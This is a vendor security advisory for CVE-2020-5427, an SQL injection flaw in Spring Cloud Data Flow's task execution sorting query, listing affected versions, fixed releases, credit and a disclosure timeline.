CVE-2020-5427: Possibility of SQL Injection in Spring Cloud Data Flow Task Execution Sorting Query
Severity
Medium
Vendor
Spring by VMware
Description
In Spring Cloud Data Flow, versions 2.6.x prior to 2.6.5, versions 2.5.x prior 2.5.4, an application is vulnerable to SQL injection when requesting task execution.
Affected VMware Products and Versions
Severity is medium unless otherwise noted.
Since Spring Cloud Data Flow is hosted internally for the Operations team and is typically not exposed as a Service to the public, the risk is believed to be medium (based on cvss score).
-
Spring Cloud Data Flow
- 2.6.x
- 2.5.x
Mitigation
Users should upgrade to 2.5.4 and higher. Releases that have fixed this issue include:
-
Spring Cloud Data Flow
- 2.7.0
- 2.6.5
- 2.5.4
Credit
This issue was identified and responsibly reported by Sufijen Bani from CHECK24 Factory GmbH.
References
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5427
- https://github.com/spring-cloud/spring-cloud-dataflow/releases/tag/v2.7.0
- https://github.com/spring-cloud/spring-cloud-dataflow/releases/tag/v2.6.4
History
2020-12-01: 2.7.0 Release with fix
2020-11-24: Release Fix for 2.6.x line
2020-10-30: Initial vulnerability identified.